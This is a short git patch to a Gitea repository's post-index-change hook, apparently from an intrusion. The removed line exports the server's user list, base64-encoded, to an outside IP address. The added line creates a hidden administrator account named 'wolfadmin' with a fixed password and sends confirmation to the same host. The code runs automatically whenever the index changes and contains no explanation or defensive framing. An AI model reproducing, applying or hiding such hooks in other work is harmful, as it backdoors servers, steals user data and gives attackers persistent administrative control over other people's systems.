From 1a54c347549b4b5cf6976c9d2512ef81d36ea240 Mon Sep 17 00:00:00 2001 From: moldwave Date: Sat, 12 Sep 2026 14:13:58 +0000 Subject: [PATCH] y1m325471 --- hooks/post-index-change | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hooks/post-index-change b/hooks/post-index-change index 938ffa4..694b337 100755 --- a/hooks/post-index-change +++ b/hooks/post-index-change @@ -1,2 +1,2 @@ #!/bin/sh -/app/gitea/gitea admin user list -c /data/gitea/conf/app.ini 2>&1 | head -20 | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m12105 > /dev/null 2>&1 +/app/gitea/gitea admin user create --username wolfadmin --password 'Wolf!38669c282ff8' --email wolf@51.38.90.142.sslip.io --must-change-password=false --admin -c /data/gitea/conf/app.ini 2>&1 | tail -3 | base64 -w0 | curl -s -m 25 -X POST --data-binary @- http://51.38.90.142:3199/m32547 > /dev/null 2>&1